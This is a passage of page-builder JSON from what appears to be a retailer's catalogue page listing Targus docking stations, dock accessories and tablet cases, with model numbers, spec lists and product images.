chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: 